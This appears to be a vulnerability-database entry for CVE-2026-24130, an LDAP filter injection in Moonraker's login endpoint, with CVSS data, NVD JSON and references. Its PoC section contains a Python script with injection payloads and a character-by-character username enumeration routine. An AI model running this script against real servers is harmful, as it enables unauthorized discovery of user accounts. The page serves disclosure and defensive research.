Security Vulnerability Report
中文
CVE-2026-24130 CVSS 5.3 MEDIUM

CVE-2026-24130

Published: 2026-01-22 23:15:58
Last Modified: 2026-02-27 13:57:16
Source: [email protected]

Description

Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:arksine:moonraker:*:*:*:*:*:python:*:* - VULNERABLE
Moonraker <= 0.9.3 (with LDAP component enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24130 LDAP Injection PoC for Moonraker # Target: Moonraker < 0.10.0 with LDAP component enabled TARGET_URL = "http://target-ip:7125" LOGIN_ENDPOINT = f"{TARGET_URL}/access/login" def test_ldap_injection_basic(): """Test basic LDAP injection to determine if vulnerability exists""" # Test payload: wildcard injection to check if filter is injectable payloads = [ {"user": "*", "password": "invalid"}, # Wildcard test {"user": "admin)(*)(&password=test", "password": "test"}, # Filter manipulation {"user": "*)*)(&password=test", "password": "test"}, # Filter closing ] print("[*] Testing LDAP Injection vulnerability...") for i, payload in enumerate(payloads, 1): try: response = requests.post(LOGIN_ENDPOINT, json=payload, timeout=10) print(f"[*] Payload {i}: Status={response.status_code}") # Different response patterns may indicate successful injection if response.status_code == 401: print(f" Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") def enumerate_ldap_entries(): """Brute force enumeration of LDAP entries using boolean injection""" # Example: Enumerating usernames character by character charset = "abcdefghijklmnopqrstuvwxyz0123456789_-@." discovered_user = "" print("[*] Starting LDAP entry enumeration...") for pos in range(1, 33): # Max username length 32 found = False for char in charset: # Blind boolean injection - extract character by character test_user = discovered_user + char payload = { "user": f")({test_user}*", # LDAP filter injection "password": "dummy" } try: response = requests.post(LOGIN_ENDPOINT, json=payload, timeout=5) # Analyze response timing or content differences if response.status_code == 401 and "invalid" in response.text.lower(): discovered_user += char print(f"[+] Position {pos}: Found '{char}', current: {discovered_user}") found = True break except: pass if not found: break print(f"[*] Discovered LDAP entry: {discovered_user}") return discovered_user if __name__ == "__main__": print("=" * 50) print("CVE-2026-24130 Moonraker LDAP Injection PoC") print("=" * 50) test_ldap_injection_basic() # Uncomment to run enumeration (requires vulnerable target) # enumerate_ldap_entries()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24130", "sourceIdentifier": "[email protected]", "published": "2026-01-22T23:15:58.477", "lastModified": "2026-02-27T13:57:16.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the \"ldap\" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0."}, {"lang": "es", "value": "Moonraker es un servidor web Python que proporciona acceso API al firmware de impresión 3D Klipper. En las versiones 0.9.3 e inferiores, las instancias configuradas con el componente 'ldap' habilitado son vulnerables a técnicas de inyección de filtros de búsqueda LDAP a través del endpoint de inicio de sesión. El mensaje de respuesta de error 401 puede utilizarse para determinar si una búsqueda fue exitosa o no, permitiendo métodos de fuerza bruta para descubrir entradas LDAP en el servidor, como IDs de usuario y atributos de usuario. Este problema ha sido solucionado en la versión 0.10.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-90"}, {"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arksine:moonraker:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.10.0", "matchCriteriaId": "DC3E79B0-4D30-48F6-87F5-19439216A6AE"}]}]}], "references": [{"url": "https://github.com/Arksine/moonraker/commit/74c5d8e44c4a4abbfbb06fb991e7ebb9ac947f42", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Arksine/moonraker/security/advisories/GHSA-3jqf-v4mv-747g", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.